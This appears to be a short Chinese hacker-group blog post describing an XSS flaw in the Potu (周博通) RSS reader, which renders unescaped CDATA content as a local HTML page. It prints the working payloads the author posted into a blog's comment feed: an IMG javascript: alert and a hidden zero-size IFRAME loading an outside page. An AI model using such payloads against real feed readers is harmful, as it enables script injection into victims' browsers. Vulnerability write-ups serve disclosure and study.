鬼仔's Blog

周博通是目前最流行的免费RSS阅读器之一，界面友好，分类清晰，操作简单．内置新浪网、新华网、天极网、计世网等数百个RSS新闻源，不用打开网页就可第一时间阅读自己喜欢的新闻。

CDATA部件在XML里：

If your text contains a lot of "<" or "&" characters – as program code often does – the XML element can be defined as a CDATA section.
如果文本包含了很多的"<"字符和"&"字符——就象程序代码一样，那么最好把他们都放到CDATA部件中。
everything inside the CDATA section is ignored by the parser.所有在CDATA部件之间的文本都会被解析器忽略。

而potu却自作聪明，把代码转换成了html，然后再从他自带的浏览器中打开。

C:\Program Files\zhoubotong\RssReader\Common\temphtmlb.htm

看起来很方面，却忽略了一些安全因素。
比如这个CDATA，转换的时候，并没有做任何处理。导致了xss漏洞。

现在我在blog里回复了一条xss语句。（刚好师父的blog里面有这个语句大全,所以。。。）

因为本来订阅文章那里是用户订阅的。
http://promise.cnxhacker.com/blog/feed.asp

而文章那里的rss只能是师父可以编辑，我们能编辑只能是回复的rss。
http://promise.cnxhacker.com/blog/feed.asp?q=comment

刚好，这个回复的通常只有blog的主人会去浏览。

<IMG SRC="javascript:alert('hacked by kxlzx');">
如果成功攻击，会出现一个匡。

但是<IFRAME src="http://www.inbreak.net/kxlzx1.htm" frameBorder=0 width=0 height=0></IFRAME> 这个东西却不行，原因并不是potu的事情，而是该blog本身的防范，把这句自动转换成了

“ <IFRAME src="<a href="http://www.inbreak.net/kxlzx1.htm" title="http://www.inbreak.net/kxlzx1.htm" target="_blank">http://www.inbreak.net/kxlzx1.htm</a>" frameBorder=0 width=0 height=0></IFRAME>”

结果不能执行。
也就是说如果换个地方，也许会。。。

相关动画下载:

http://www.inbreak.net/blog/uploads/20060722/potuxss.rar

空虚浪子心[XGC]

中国X黑客小组技术部.
http://www.cnxhacker.com